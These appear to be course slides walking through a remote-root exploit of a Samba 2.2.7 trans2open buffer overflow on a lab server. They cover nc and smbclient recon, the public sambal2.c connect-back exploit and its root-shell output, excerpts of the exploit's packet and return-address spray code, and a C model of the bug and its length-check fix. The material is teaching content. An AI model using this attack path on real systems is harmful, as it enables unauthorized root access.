CS 4010 Hacking Samba Server Vulnerabilities. Recon Telnet headers claim the following: –Red Hat Linux release 9 (Shrike) –Kernel 2.4.20-8smp on an i686.


CS 4010 Hacking Samba Server Vulnerabilities

Recon
The telnet login banner claims the following:
– Red Hat Linux release 9 (Shrike)
– Kernel 2.4.20-8smp on an i686
nc -v -z
– -z tells nc to only scan for listening daemons (zero-I/O mode, no data is sent) while -v gives verbose output
– cs4010.cs.uwyo.edu [ ] 139 (netbios-ssn) open
– Port 139 (netbios-ssn) open on a host that identifies itself as Linux means an SMB server, and on Linux that is almost certainly Samba. (Or at least something posing as Samba; a banner is a claim, not proof.)

It begins…
Knowing from experience and from several vulnerability sites that Samba has a poor security track record, I started poking at it harder:
smbclient -N //cs4010/IPC$
– -N suppresses the password prompt, so this is an anonymous (null-session) login to the IPC$ share using the Samba client

smbclient
Anonymous login successful. Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.7]
Now I know exactly which server software is running, and that I can reach it without a password or any other authentication token. The anonymous part matters for what follows: only bugs reachable before authentication are of any use.

Research
Now I know I can reach a service on the system that is probably vulnerable, but not how to exploit it. SecurityFocus provides the answer:
– Search for Samba vulnerabilities
– 2.2.7a is a vulnerable version:

Security Focus
From past experience I know that this site provides a lot of good security information, in many cases with specific ‘examples’ of how something is done. Go to the vulnerabilities section and search by vendor. We know the Samba server is version 2.2.7a. The search reveals numerous vulnerabilities:

Samba Vulnerabilities
That gives a list of vulnerabilities specific to the Samba version we are connecting to. Denial-of-service entries are eliminated first (crashing the server gives no access), and many of the remaining ones require an authenticated user. Since we are not authenticated (-N gave us an anonymous connection) those can be ruled out as well. The rest are worth trying.

The Exploit
SecurityFocus Bugtraq ID 7294 reads:
– A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
– Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
BINGO!!! Remote, anonymous, and code execution as the Samba process, which on this box is root.

sambal2.c
./sambal
Samba < Remote Root exploit by Schizoprenic
Connect back method, Xnuxer-Labs,
Usage: ./sambal2
Targets:
0 = Linux
1 = FreeBSD/NetBSD
2 = OpenBSD 3.0 and prior
3 = OpenBSD non-exec stack
“Connect back” means the shellcode makes the target connect out to a listener on the attacker’s machine, which works even when inbound connections to the target are filtered.

More sambal2.c
~/4010]$ ./sambal
[+] Listen on port:
[+] Connecting back to: [ :45295]
[+] Target: Linux
[+] Connected to [ :139]
[+] Please wait in seconds...!
[+] Yeah, I have a root....!
Linux cs4010.cs.uwyo.edu 2.4.20-8smp #1 SMP Thu Mar 13 17:45:54 EST 2003 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=99(nobody)
The last two lines are uname -a and id run through the connect-back shell: the kernel matches the telnet banner, and the shell is root because smbd runs as root. (The IP addresses did not survive the transcript.)

How does it work?
It’s a standard stack-based buffer overflow. The trans2open request handler (call_trans2open() in smbd/trans2.c) copies a client-supplied filename into a fixed-size stack buffer without checking the name’s length against the buffer’s size. So, just like last lecture, we write past the end of the buffer until we overwrite the saved return address with an address of our choosing; when the function returns, execution lands on our shellcode instead of going back to the caller.

The Source:

    char buffer[4000];
    char exploit_data[] =
        "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x00\x00\x90";

buffer is the 4000-byte packet that gets assembled and sent to the server. exploit_data is the fixed part of the SMB TRANS2 request that routes the packet to the trans2open handler; the overflow data and the shellcode are laid into buffer around it afterwards.

Autopsy of a Server
This fills part of the buffer with the addresses we want the server to pick up. The loop runs 12 times (i from 0 to 88 in steps of 8) and each pass writes two 4-byte values, a dummy value followed by the return address, so 96 bytes of the buffer become a run of (dummy, ret) pairs. Repeating the pair is what makes the exploit tolerant of not knowing the exact distance from the buffer to the saved frame pointer and return address: wherever that pair falls inside the sprayed region, it picks up (dummy, ret).

    for (i = 0; i < 4 * 24; i += 8) {
        memcpy(buffer + ... + i, &dummy, 4);
        memcpy(buffer + ... + i, &ret, 4);
    }

The base offsets into buffer are fixed constants in sambal2.c; they were lost in the transcript.

Autopsy Continued
With the address spray in place, the trans2 request header and the shellcode are copied in:

    memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
           exploit_data, sizeof(exploit_data) - 1);
    memcpy(buffer + ..., shellcode, strlen(shellcode));

The first copy places exploit_data right after the NetBIOS session header (4 bytes on the wire) and the SMB header (32 bytes on the wire); sizeof(exploit_data) - 1 drops the string literal’s terminating NUL. The second drops the shellcode at a fixed offset further into the buffer, the region the sprayed return address is expected to point into. That offset, too, was lost in the transcript.

The Why.
The vulnerability exists because a string operation copies a client-supplied string into a fixed-size buffer without first comparing the size of the buffer to the length of the string. The buffer is allocated on the stack during a function call, so an overflow runs upward into the saved frame pointer and the saved return address; when the function returns, the CPU loads the attacker’s value into the instruction pointer.
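The pattern described on the last few slides, as an added example that is not code from the slides or from sambal2.c: a small model of the trans2open bug, the exploit’s (dummy, ret) spray loop generalised to any offset and pair count, and the length check that fixes the bug. The frame layout, the 32-byte buffer (smbd’s real one is a 1024-byte pstring), the function names and the addresses 0xbffff000/0xbffffed4 are assumptions for illustration, and the demo assumes a little-endian host like the i686 target.

```c
/* Added example, not from the slides or sambal2.c: a model of the trans2open
 * overflow, the exploit's (dummy, ret) spray, and the bounds check that fixes
 * the bug.  Layout, sizes, names and addresses are assumptions for
 * illustration; assumes a little-endian host like the i686 target. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of one x86 stack frame as the exploit sees it: the fixed-size name
 * buffer, then the saved frame pointer and saved return address that sit
 * just above it.  Real offsets depend on the compiler; these are assumed. */
struct frame_model {
    char     fname[32];   /* smbd's real buffer is a 1024-byte pstring */
    uint32_t saved_ebp;   /* overwritten by the exploit's "dummy" value */
    uint32_t saved_eip;   /* overwritten by the exploit's "ret" value */
};

/* Vulnerable pattern: namelen is taken from the client request and
 * sizeof(fname) is never consulted.  Writing through a byte pointer into
 * the whole struct keeps this model within defined behaviour while still
 * running past fname into saved_ebp and saved_eip.  The clamp exists only
 * to keep the model sane; the real code had no bound at all. */
size_t unchecked_copy(struct frame_model *fr, const unsigned char *pname, size_t namelen)
{
    unsigned char *dst = (unsigned char *)fr + offsetof(struct frame_model, fname);
    if (namelen > sizeof *fr)
        namelen = sizeof *fr;
    memcpy(dst, pname, namelen);
    return namelen;
}

/* Fixed pattern: compare the length with the buffer first, leaving room for
 * the terminating NUL, and reject the request instead of truncating silently. */
int checked_copy(struct frame_model *fr, const unsigned char *pname, size_t namelen)
{
    if (namelen >= sizeof fr->fname)
        return -1;            /* refused: nothing is written */
    memcpy(fr->fname, pname, namelen);
    fr->fname[namelen] = '\0';
    return 0;
}

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v);
    p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16);
    p[3] = (unsigned char)(v >> 24);
}

/* The sambal2.c loop, generalised: write 'pairs' consecutive (dummy, ret)
 * pairs at buf+off.  The exploit's "for (i = 0; i < 4 * 24; i += 8)" is
 * pairs == 12, i.e. 96 bytes.  Because the pair repeats every 8 bytes, the
 * saved EBP/EIP pair picks up (dummy, ret) wherever it falls in the region,
 * so the exact buffer-to-return-address distance need not be known. */
size_t spray_pairs(unsigned char *buf, size_t off, size_t pairs, uint32_t dummy, uint32_t ret)
{
    size_t i;
    for (i = 0; i < pairs * 8; i += 8) {
        put_le32(buf + off + i, dummy);
        put_le32(buf + off + i + 4, ret);
    }
    return pairs * 8;
}

/* Constructed request: 32 bytes of filler, then one (dummy, ret) pair.
 * Returns the value that ended up in the saved return address. */
uint32_t demo_overwrite(void)
{
    unsigned char req[sizeof(struct frame_model)];
    struct frame_model fr;
    memset(&fr, 0, sizeof fr);
    memset(req, 'A', sizeof req);
    spray_pairs(req, sizeof fr.fname, 1, 0xbffff000u, 0xbffffed4u); /* assumed addresses */
    unchecked_copy(&fr, req, sizeof req);
    return fr.saved_eip;   /* 0xbffffed4: control of EIP when the function returns */
}

/* Same request against the fixed copy: returns 1 if it was refused and the
 * saved return address is untouched. */
int demo_rejected(void)
{
    unsigned char req[sizeof(struct frame_model)];
    struct frame_model fr;
    memset(&fr, 0, sizeof fr);
    memset(req, 'A', sizeof req);
    return checked_copy(&fr, req, sizeof req) == -1 && fr.saved_eip == 0;
}

int main(void)
{
    printf("unchecked copy: saved_eip = 0x%08x\n", (unsigned)demo_overwrite());
    printf("checked copy refused the request: %d\n", demo_rejected());
    return 0;
}
```

Build with `cc -std=c99 -Wall model.c && ./a.out`. The model deliberately keeps the overrun inside one struct so it runs without crashing; on the real server the same write runs off the end of smbd’s frame, which is why the exploit’s sprayed pairs, not a single carefully placed address, are what make it reliable across builds.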

Conclusion
This was a well-known exploit of a buffer overflow vulnerability. With a minimal amount of research and even less work it produced a completely compromised system: a root shell, because smbd runs as root. The fix is equally well known, a minor patch released by all vendors, and the safe version of the code does the one thing the vulnerable version skipped: compare the length against the buffer before copying.

Sources
– http://downloads.securityfocus.com/vulnerabilities/exploits/sambal2.c
– Darrah_GCIH.pdf (http:// Darrah_GCIH.pdf; the host part of the URL is missing from the transcript)